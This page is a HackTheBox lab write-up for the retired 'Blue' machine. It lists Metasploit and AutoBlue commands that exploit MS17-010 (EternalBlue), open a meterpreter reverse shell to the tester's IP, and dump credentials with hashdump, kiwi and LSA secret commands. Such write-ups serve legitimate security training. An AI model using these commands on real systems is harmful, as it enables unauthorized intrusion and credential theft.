HHousen HackTheBox Writeups
  • README
  • Machines
    • Pandora
    • Secret
    • Paper
    • OpenAdmin
    • Doctor
    • Meta
    • Driver
    • Backdoor
    • Devzat
    • Horizontall
    • RouterSpace
    • AdmirerToo
    • Shibboleth
    • Timelapse
    • Noter
    • Talkative
    • OpenSource
    • Faculty
    • StreamIO
    • Carpediem
    • RedPanda
    • Support
    • Shared
    • Scrambled
    • Retired
    • Trick
    • Hathor
  • Challenges
    • Templated
    • Under Construction
  • Old Starting Point Writeups
    • Archetype
    • Oopsie
    • Shield
    • Vaccine
  • Old Machine Writeups
    • Bashed
    • Blue
    • Devel
    • Grandpa
    • Jerry
    • Lame
    • Legacy
    • Netmon
    • Nibbles
    • Optimum
Powered by GitBook
On this page

Was this helpful?

Edit on GitHub
  1. Old Machine Writeups

Blue

HTB - 3. Blue (MS17.010)

  1. nmap -T4 -p- -A 10.10.10.40 shows 139 & 445 (smb) open, version Windows 7 Professional 7601 Service Pack 1, computer name is haris-PC, message signing enabled by not required,

  2. Metaploit Test if vulnerable

    sudo msfconsole
    search ms17-010
    use auxiliary/scanner/smb/smb_ms17_010
    options
    set rhosts 10.10.10.40
    run

    Result: Host is likely vulnerable

    Exploit:

    use exploit/windows/smb/ms17_010_eternalblue
    set rhosts 10.10.10.40
    show targets
    run

    Result: shell popped with nt authoirty/system

    Used an un-staged payload, so lets try staged and get a meterpreter

    set payload windows/x64/meterpreter/reverse_tcp
    options
    run
    getuid
    sysinfo
    hashdump
    shell
    route print
    arp -a
    netstat -ano
    load kiwi
    help
    creds_all
    lsa_dump_sam
    lsa_dump_secrets
    load incognito
    list_tokens -u
  3. Autoblue: https://github.com/3ndG4me/AutoBlue-MS17-010

    git clone https://github.com/3ndG4me/AutoBlue-MS17-010
    cd AutoBlue-MS17-010
    ls
    python eternalblue_checker.py 10.10.10.40

    Result: Target not patched

    Exploit:

    cd shellcode
    sudo ./shell_prep.sh
    y
    10.10.14.24
    4445
    4446
    0 <-- Meterpreter instead of shell
    0 <-- Staged instead of un-staged
    cd ..
    ls
    sudo ./listener_prep.sh
    10.10.14.24
    4445
    4446
    0
    0
    python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
    sessions
    sessions 1
    getuid
    whoami
    sysinfo
PreviousBashedNextDevel

Last updated 2 years ago

Was this helpful?